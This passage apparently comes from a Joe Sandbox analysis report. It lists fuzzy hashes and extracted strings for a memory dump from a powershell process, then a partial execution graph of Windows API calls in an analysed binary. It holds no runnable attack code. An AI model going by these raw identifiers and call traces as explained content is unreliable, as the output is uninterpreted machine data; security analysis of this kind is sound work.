                                                                                                      • Instruction ID: ba3f46da0fc5d619781538837e01a72aa07fabd347764ec52206156bd3eedbb5
                                                                                                      • Opcode Fuzzy Hash: 016b88b1dc1f27a6905c6d09f39a6382425679285b0031a061aca4564049a831
                                                                                                      • Instruction Fuzzy Hash: EE91AFB0B002059FD714DF68D950BAEB7F3AF99304F108469E905AF791DB76EC818B92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk$-jk
                                                                                                      • API String ID: 0-4004959738
                                                                                                      • Opcode ID: 061bf037866f9f9f81a4bd86f1ae88df3a4ac675056622c4a04206f638cfb613
                                                                                                      • Instruction ID: bd7b8c1ab87003c2c9d9af28515e4851a2b6e7bc5671103c3641b7b94220318e
                                                                                                      • Opcode Fuzzy Hash: 061bf037866f9f9f81a4bd86f1ae88df3a4ac675056622c4a04206f638cfb613
                                                                                                      • Instruction Fuzzy Hash: DAF182B0A00219DFDB64DF68D890B9AB7B2AF84304F14849AD509AF781DB75DD81CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk$-jk
                                                                                                      • API String ID: 0-4004959738
                                                                                                      • Opcode ID: 276ea18bcdc87c18a39efb4850f529ddcf97e8c8b2cf0285ff196d0d71ad0b77
                                                                                                      • Instruction ID: 785c0818ef411356f7182e8eb2400f0395bca361e3750112dd89cb9dc906310f
                                                                                                      • Opcode Fuzzy Hash: 276ea18bcdc87c18a39efb4850f529ddcf97e8c8b2cf0285ff196d0d71ad0b77
                                                                                                      • Instruction Fuzzy Hash: 95D18DB0B00209AFDB14DF6CD850B9EB7B2AF88304F21C469D501AF395DB76EC468B91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk$-jk
                                                                                                      • API String ID: 0-4004959738
                                                                                                      • Opcode ID: 9eec96a07941d2caee496c5889ba76613799b71b09859eaa237a21c4b4c32b3f
                                                                                                      • Instruction ID: 9e65de2bc31bbcfd55c3817297f965ae9ca720c18e6b6f758a9c377498860a46
                                                                                                      • Opcode Fuzzy Hash: 9eec96a07941d2caee496c5889ba76613799b71b09859eaa237a21c4b4c32b3f
                                                                                                      • Instruction Fuzzy Hash: 92B1CEB0B00205AFDB14DF6CD940B9EBBB2AF88304F25C159D505AF392DB76E846CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$x.jk
                                                                                                      • API String ID: 0-571053648
                                                                                                      • Opcode ID: 7152460fae40a7dc8cc91b6e7028cfd090192277c12f38bd963409a30d7e4f09
                                                                                                      • Instruction ID: ee4c4ab6f28ad625e6a4d8e04f0763a085dfeb0d69d3cb80d3990c854cf92976
                                                                                                      • Opcode Fuzzy Hash: 7152460fae40a7dc8cc91b6e7028cfd090192277c12f38bd963409a30d7e4f09
                                                                                                      • Instruction Fuzzy Hash: A391BFB4A00205EFD704DF68D990BAEB7B3AF99304F108469E505AF791CB76EC91CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl
                                                                                                      • API String ID: 0-2992701587
                                                                                                      • Opcode ID: 21d702fdaf357e6c238c9260c091c0043e664e8eb4e8e897e04b3b42a45c4112
                                                                                                      • Instruction ID: e7652ed00b231672853db9e98841badc0d66bafce9cf39516f0bf74c0c21107c
                                                                                                      • Opcode Fuzzy Hash: 21d702fdaf357e6c238c9260c091c0043e664e8eb4e8e897e04b3b42a45c4112
                                                                                                      • Instruction Fuzzy Hash: E32268B0B00215DFDB60DF18C981F59B7B2AB98304F14C095E9099B792DB76ED86CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #ik
                                                                                                      • API String ID: 0-2131464689
                                                                                                      • Opcode ID: e05450549e3cde4516d1c105e078d69a07ea434b0f47dfbeaea8fb4f75878a63
                                                                                                      • Instruction ID: ad8fa8785fe1894a21e4852628cd33e663beb4f8f66414f605f573985cfeb875
                                                                                                      • Opcode Fuzzy Hash: e05450549e3cde4516d1c105e078d69a07ea434b0f47dfbeaea8fb4f75878a63
                                                                                                      • Instruction Fuzzy Hash: 0BD168B17043068FDB159E7CD81077A77A29FE6209F1484AAE512DF292EBB9D841C3F1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x.jk
                                                                                                      • API String ID: 0-4167960440
                                                                                                      • Opcode ID: c7828613999ee54f8ed7d1fff5f8fef21a3b4fd607adbfad200578e441cf1887
                                                                                                      • Instruction ID: c6290028cbe2d8b2a16dcfed48aafea43a80965e5e4eb00227ba3e6b95bba2ca
                                                                                                      • Opcode Fuzzy Hash: c7828613999ee54f8ed7d1fff5f8fef21a3b4fd607adbfad200578e441cf1887
                                                                                                      • Instruction Fuzzy Hash: D43193B0B40204ABEB14AB78D854BAE77B3AF84340F20D459EA01AF7D1CE75EC418BD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f68a894f6a1eaac9a16e8e29af63fb271ecb5aa619ff486f8b0db76a82afd6b1
                                                                                                      • Instruction ID: fd58d7819982dee18e375aa972f259f92d644d00147de3e2f32779857b29d6da
                                                                                                      • Opcode Fuzzy Hash: f68a894f6a1eaac9a16e8e29af63fb271ecb5aa619ff486f8b0db76a82afd6b1
                                                                                                      • Instruction Fuzzy Hash: 743226B1B0420ADFDB249F6DD8007AAB7E2AFD5211F14807AE915DB291DB35D841CBF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e3c09502922df0d13c87d6df15077db57cf40fb181de3b37fe613816eee3712
                                                                                                      • Instruction ID: 59e519562f00b16cd8c5688a156c3265cd6e01571e38b292c6f8bc2be8720673
                                                                                                      • Opcode Fuzzy Hash: 9e3c09502922df0d13c87d6df15077db57cf40fb181de3b37fe613816eee3712
                                                                                                      • Instruction Fuzzy Hash: 8D1288B17043068FCB198F6DD91076ABBA29FE2211F14C47AE595DB391EB35C842C7E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25f3d13a705e5ab64d86121484ff7a4f9745d2cff80163cdd745516aaeb20484
                                                                                                      • Instruction ID: 79a89f6b7c93f20c58bfe28466465f714b99c311b29b3785ad5fd165d14d0333
                                                                                                      • Opcode Fuzzy Hash: 25f3d13a705e5ab64d86121484ff7a4f9745d2cff80163cdd745516aaeb20484
                                                                                                      • Instruction Fuzzy Hash: 5EE115B170420ADFDB259F6DD8107AABBB2BFA6211F14C0AAD845CF252DB35C941C7E1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c9fa293811d59f865f38d233a42929262617df85b08fb0f6e0b2262bd882510
                                                                                                      • Instruction ID: 308e94ce795e60ce366ca8c2067fc4112ace402fb58894ae45a3c148d305f494
                                                                                                      • Opcode Fuzzy Hash: 7c9fa293811d59f865f38d233a42929262617df85b08fb0f6e0b2262bd882510
                                                                                                      • Instruction Fuzzy Hash: A641F5F0B04206CFCB209F6CD550B6977B2AFA5248F1884A5F505DB251EB3ADA40C7F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 34e7078f83a9d3bccb348a1859808b1d34bf8ef51485f22780a5dfdcdfec2513
                                                                                                      • Instruction ID: 537e9903e44816922906aef11a5c218ae25cbbdf361fb6dc3d3ec2e4f5ef001e
                                                                                                      • Opcode Fuzzy Hash: 34e7078f83a9d3bccb348a1859808b1d34bf8ef51485f22780a5dfdcdfec2513
                                                                                                      • Instruction Fuzzy Hash: AD412EF5A003028FCB199F6C8581B667BB29F91255F15C095E584DF362E735D841C7E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 50d737b1388786cdfa9d29eb5108a7528eab755968bf050dace53dd163b97757
                                                                                                      • Instruction ID: 3414d18bc448261ae64b09064c3705766bf5daced72fa707d7a1653c0dbafa7a
                                                                                                      • Opcode Fuzzy Hash: 50d737b1388786cdfa9d29eb5108a7528eab755968bf050dace53dd163b97757
                                                                                                      • Instruction Fuzzy Hash: 512138B271030A9BEB2459BE9890B37B2975FD5A55F24842AA505CB3C1DD76C841C3E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e7dbb58008220c4ca1eeede5795caae60d196b3745202da272a875faa1d8914
                                                                                                      • Instruction ID: b5169f3eb9dcd9f6112d900152dc436f1a510cc2612905bbca91ca211b6c0ed8
                                                                                                      • Opcode Fuzzy Hash: 1e7dbb58008220c4ca1eeede5795caae60d196b3745202da272a875faa1d8914
                                                                                                      • Instruction Fuzzy Hash: 5C216BB230031EDBEB249ABE884073773979BD5715F24842AD546DB3C1DEB5C94083E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 269c02174d326a22fcc4829577bf69f6b646883024bac6105bf83795c41169f3
                                                                                                      • Instruction ID: 3f8708ab827b6cd53b728e172eb754f8098679a8e636d5148474d62b5e2554af
                                                                                                      • Opcode Fuzzy Hash: 269c02174d326a22fcc4829577bf69f6b646883024bac6105bf83795c41169f3
                                                                                                      • Instruction Fuzzy Hash: 57215BF260838A5BDB2109798D507627F624FA2755F284057D944CF2D2EA7AC840C7A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f27f6e4af76fb7d7c9147bd5a0c0b1fdc27bc881d8d5bc566d6c5ab8fb7e987a
                                                                                                      • Instruction ID: 8d1eac93823c70d7ba27c6242be94c0db41ab3dc7bf88758ae477ec302425f46
                                                                                                      • Opcode Fuzzy Hash: f27f6e4af76fb7d7c9147bd5a0c0b1fdc27bc881d8d5bc566d6c5ab8fb7e987a
                                                                                                      • Instruction Fuzzy Hash: D3117BF230030EE7EB2049BE880077677975B95751F18892AE945DB2C1DAB5C98083F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c59220bed069272102d5f7472e148fb4802a1643d6e2ddc5b4c1057ba4ed88f
                                                                                                      • Instruction ID: ca56d97a6d273f4d24ccc7e7d8c4a40738702bb8dbb3ed8997c1faa6d6219884
                                                                                                      • Opcode Fuzzy Hash: 9c59220bed069272102d5f7472e148fb4802a1643d6e2ddc5b4c1057ba4ed88f
                                                                                                      • Instruction Fuzzy Hash: 4B01477631031A8BDB6089AED40027AB39BEBE1632F14C03ED44DCB200DA36C806C3E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl$4vl$4vl$tLkk
                                                                                                      • API String ID: 0-2050809188
                                                                                                      • Opcode ID: cc4ab63c615b792390398a27fa6e27a5ba22007a5b1b35f8a1fb8e817da370fd
                                                                                                      • Instruction ID: db711e80e2d8c90937851db3972c7e23c9747b9807a6000c307faa11595c31ba
                                                                                                      • Opcode Fuzzy Hash: cc4ab63c615b792390398a27fa6e27a5ba22007a5b1b35f8a1fb8e817da370fd
                                                                                                      • Instruction Fuzzy Hash: 1A6190B0B10209DBDB24DF5CC840B6AB7B2AF99214F14C569D806EB741DB72DC42CBD2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ol$ol$ol$ol
                                                                                                      • API String ID: 0-3598129632
                                                                                                      • Opcode ID: 56dc52bb32249a93616455b904c394e204ada5452365645aea4e928ec1e67154
                                                                                                      • Instruction ID: c536416469e26be82938f4851dc3b4ade67ed37e7e84e620ae2fb5a0e9f0a5d9
                                                                                                      • Opcode Fuzzy Hash: 56dc52bb32249a93616455b904c394e204ada5452365645aea4e928ec1e67154
                                                                                                      • Instruction Fuzzy Hash: 48F169B17042068FDB148F6DD8117AABBE2AFD6214F14C06AD55ACB251DBB2DC41CBE2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$x.jk$-jk
                                                                                                      • API String ID: 0-311673467
                                                                                                      • Opcode ID: 93e15402509b38cfcd48c2b9c569970c1bdac9635c3bbad1c395cc3f6ce52575
                                                                                                      • Instruction ID: 46554df1749ac48d50d5c6ca54ca82e1b2dacb8aeeeda3ccf75f6e5f9c483315
                                                                                                      • Opcode Fuzzy Hash: 93e15402509b38cfcd48c2b9c569970c1bdac9635c3bbad1c395cc3f6ce52575
                                                                                                      • Instruction Fuzzy Hash: 8FC18DF0A00209DFDB24DF58C950BAEBBB2AF98304F148569D905AB794DB75EC42CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl
                                                                                                      • API String ID: 0-4278018943
                                                                                                      • Opcode ID: c46cb504c33a0277eb1c5770a63d96b8b387666b33f7322513dd1dd1f8944935
                                                                                                      • Instruction ID: dbb2bf4fb8ef525b37335a4f90a9502568b8895b189ad1def3392821270a3b66
                                                                                                      • Opcode Fuzzy Hash: c46cb504c33a0277eb1c5770a63d96b8b387666b33f7322513dd1dd1f8944935
                                                                                                      • Instruction Fuzzy Hash: ACA191B0B00605EBDB20CF5DC580A6AB7B2BF99714F14C96AC916AB744E772A841CFD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl
                                                                                                      • API String ID: 0-4278018943
                                                                                                      • Opcode ID: 08ae724a125964366e98dc7c310e953387bae15da4d4af308a3e7163c13786da
                                                                                                      • Instruction ID: 9d27853644c42959acb9fb9adbe209a3e61a2da04ccbf812407f5b0bf67ac84a
                                                                                                      • Opcode Fuzzy Hash: 08ae724a125964366e98dc7c310e953387bae15da4d4af308a3e7163c13786da
                                                                                                      • Instruction Fuzzy Hash: 8EA19FB0B00205EBDB20CF5DC580A6EB7B2BF99714F14C96AD916AB744E772A841CFD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl
                                                                                                      • API String ID: 0-4278018943
                                                                                                      • Opcode ID: 4d5df586c68fc194ef4a4b44c081cbbbca44771ade198d61bf550b4956629526
                                                                                                      • Instruction ID: 515532a9bc50b8c0c206e8176267332937fda380198abbeff281c1fa065d303f
                                                                                                      • Opcode Fuzzy Hash: 4d5df586c68fc194ef4a4b44c081cbbbca44771ade198d61bf550b4956629526
                                                                                                      • Instruction Fuzzy Hash: 427199F0A00209DFDB14DF58D980BAEB7B2AF99314F148169E916AB341DB72EC41CBD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$4vl$tLkk
                                                                                                      • API String ID: 0-380497426
                                                                                                      • Opcode ID: 14d747e657e75207fb6b93d60dac20c9648a2cdef13112bb39f30c3e7646687c
                                                                                                      • Instruction ID: d1fec9d7c0f90001a5ea445ab75188c9d37a8c8c2f10cc6cb2975fef8a6f3834
                                                                                                      • Opcode Fuzzy Hash: 14d747e657e75207fb6b93d60dac20c9648a2cdef13112bb39f30c3e7646687c
                                                                                                      • Instruction Fuzzy Hash: CD518FB0A00205DFDB25CF5CC480BAABBB2BFA5714F188569D815EB751D736E882CBD1

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:5.9%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:1.8%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:73
                                                                                                      execution_graph 40299 441819 40302 430737 40299->40302 40301 441825 40303 430756 40302->40303 40304 43076d 40302->40304 40305 430774 40303->40305 40306 43075f 40303->40306 40304->40301 40317 43034a memcpy 40305->40317 40316 4169a7 11 API calls 40306->40316 40309 4307ce 40310 430819 memset 40309->40310 40318 415b2c 11 API calls 40309->40318 40310->40304 40312 4307e9 40312->40304 40312->40310 40313 43077e 40313->40304 40313->40309 40314 4307fa 40313->40314 40319 4169a7 11 API calls 40314->40319 40316->40304 40317->40313 40318->40312 40319->40304 39599 442ec6 19 API calls 39786 4152c6 malloc 39787 4152e2 39786->39787 39788 4152ef 39786->39788 39790 416760 11 API calls 39788->39790 39790->39787 37676 4466f4 37695 446904 37676->37695 37678 446700 GetModuleHandleA 37681 446710 __set_app_type __p__fmode __p__commode 37678->37681 37680 4467a4 37682 4467ac __setusermatherr 37680->37682 37683 4467b8 37680->37683 37681->37680 37682->37683 37696 4468f0 _controlfp 37683->37696 37685 4467bd _initterm __wgetmainargs _initterm 37686 44681e GetStartupInfoW 37685->37686 37687 446810 37685->37687 37689 446866 GetModuleHandleA 37686->37689 37697 41276d 37689->37697 37693 446896 exit 37694 44689d _cexit 37693->37694 37694->37687 37695->37678 37696->37685 37698 41277d 37697->37698 37740 4044a4 LoadLibraryW 37698->37740 37700 412785 37732 412789 37700->37732 37748 414b81 37700->37748 37703 4127c8 37754 412465 memset ??2@YAPAXI 37703->37754 37705 4127ea 37766 40ac21 37705->37766 37710 412813 37784 40dd07 memset 37710->37784 37711 412827 37789 40db69 memset 37711->37789 37715 412822 37811 4125b6 ??3@YAXPAX DeleteObject 37715->37811 37716 40ada2 _wcsicmp 37717 41283d 37716->37717 37717->37715 37720 412863 CoInitialize 37717->37720 37794 41268e 37717->37794 37719 412966 37812 40b1ab free free 37719->37812 37810 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37720->37810 37724 41296f 37813 40b633 37724->37813 37726 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37731 412957 CoUninitialize 37726->37731 37737 4128ca 37726->37737 37731->37715 37732->37693 37732->37694 37733 4128d0 TranslateAcceleratorW 37734 412941 GetMessageW 37733->37734 37733->37737 37734->37731 37734->37733 37735 412909 IsDialogMessageW 37735->37734 37735->37737 37736 4128fd IsDialogMessageW 37736->37734 37736->37735 37737->37733 37737->37735 37737->37736 37738 41292b TranslateMessage DispatchMessageW 37737->37738 37739 41291f IsDialogMessageW 37737->37739 37738->37734 37739->37734 37739->37738 37741 4044cf GetProcAddress 37740->37741 37745 4044f7 37740->37745 37742 4044e8 FreeLibrary 37741->37742 37743 4044df 37741->37743 37744 4044f3 37742->37744 37742->37745 37743->37742 37744->37745 37746 404507 MessageBoxW 37745->37746 37747 40451e 37745->37747 37746->37700 37747->37700 37749 414b8a 37748->37749 37750 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37748->37750 37817 40a804 memset 37749->37817 37750->37703 37753 414b9e GetProcAddress 37753->37750 37756 4124e0 37754->37756 37755 412505 ??2@YAPAXI 37757 41251c 37755->37757 37760 412521 37755->37760 37756->37755 37839 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37757->37839 37828 444722 37760->37828 37765 41259b wcscpy 37765->37705 37844 40b1ab free free 37766->37844 37768 40ad76 37845 40aa04 37768->37845 37771 40a9ce malloc memcpy free free 37776 40ac5c 37771->37776 37772 40ad4b 37772->37768 37868 40a9ce 37772->37868 37774 40ace7 free 37774->37776 37776->37768 37776->37771 37776->37772 37776->37774 37848 40a8d0 37776->37848 37860 4099f4 37776->37860 37779 40a8d0 7 API calls 37779->37768 37780 40ada2 37781 40adaa 37780->37781 37782 40adc9 37780->37782 37781->37782 37783 40adb3 _wcsicmp 37781->37783 37782->37710 37782->37711 37783->37781 37783->37782 37873 40dce0 37784->37873 37786 40dd3a GetModuleHandleW 37878 40dba7 37786->37878 37790 40dce0 3 API calls 37789->37790 37791 40db99 37790->37791 37950 40dae1 37791->37950 37964 402f3a 37794->37964 37796 412766 37796->37715 37796->37720 37797 4126d3 _wcsicmp 37798 4126a8 37797->37798 37798->37796 37798->37797 37800 41270a 37798->37800 37998 4125f8 7 API calls 37798->37998 37800->37796 37967 411ac5 37800->37967 37810->37726 37811->37719 37812->37724 37814 40b640 37813->37814 37815 40b639 free 37813->37815 37816 40b1ab free free 37814->37816 37815->37814 37816->37732 37818 40a83b GetSystemDirectoryW 37817->37818 37819 40a84c wcscpy 37817->37819 37818->37819 37824 409719 wcslen 37819->37824 37822 40a881 LoadLibraryW 37823 40a886 37822->37823 37823->37750 37823->37753 37825 409724 37824->37825 37826 409739 wcscat LoadLibraryW 37824->37826 37825->37826 37827 40972c wcscat 37825->37827 37826->37822 37826->37823 37827->37826 37829 444732 37828->37829 37830 444728 DeleteObject 37828->37830 37840 409cc3 37829->37840 37830->37829 37832 412551 37833 4010f9 37832->37833 37834 401130 37833->37834 37835 401134 GetModuleHandleW LoadIconW 37834->37835 37836 401107 wcsncat 37834->37836 37837 40a7be 37835->37837 37836->37834 37838 40a7d2 37837->37838 37838->37765 37838->37838 37839->37760 37843 409bfd memset wcscpy 37840->37843 37842 409cdb CreateFontIndirectW 37842->37832 37843->37842 37844->37776 37846 40aa14 37845->37846 37847 40aa0a free 37845->37847 37846->37780 37847->37846 37849 40a8eb 37848->37849 37850 40a8df wcslen 37848->37850 37851 40a906 free 37849->37851 37852 40a90f 37849->37852 37850->37849 37853 40a919 37851->37853 37854 4099f4 3 API calls 37852->37854 37855 40a932 37853->37855 37856 40a929 free 37853->37856 37854->37853 37857 4099f4 3 API calls 37855->37857 37858 40a93e memcpy 37856->37858 37859 40a93d 37857->37859 37858->37776 37859->37858 37861 409a41 37860->37861 37862 4099fb malloc 37860->37862 37861->37776 37864 409a37 37862->37864 37865 409a1c 37862->37865 37864->37776 37866 409a30 free 37865->37866 37867 409a20 memcpy 37865->37867 37866->37864 37867->37866 37869 40a9e7 37868->37869 37870 40a9dc free 37868->37870 37872 4099f4 3 API calls 37869->37872 37871 40a9f2 37870->37871 37871->37779 37872->37871 37897 409bca GetModuleFileNameW 37873->37897 37875 40dce6 wcsrchr 37876 40dcf5 37875->37876 37877 40dcf9 wcscat 37875->37877 37876->37877 37877->37786 37898 44db70 37878->37898 37882 40dbfd 37901 4447d9 37882->37901 37885 40dc34 wcscpy wcscpy 37927 40d6f5 37885->37927 37886 40dc1f wcscpy 37886->37885 37889 40d6f5 3 API calls 37890 40dc73 37889->37890 37891 40d6f5 3 API calls 37890->37891 37892 40dc89 37891->37892 37893 40d6f5 3 API calls 37892->37893 37894 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37893->37894 37933 40da80 37894->37933 37897->37875 37899 40dbb4 memset memset 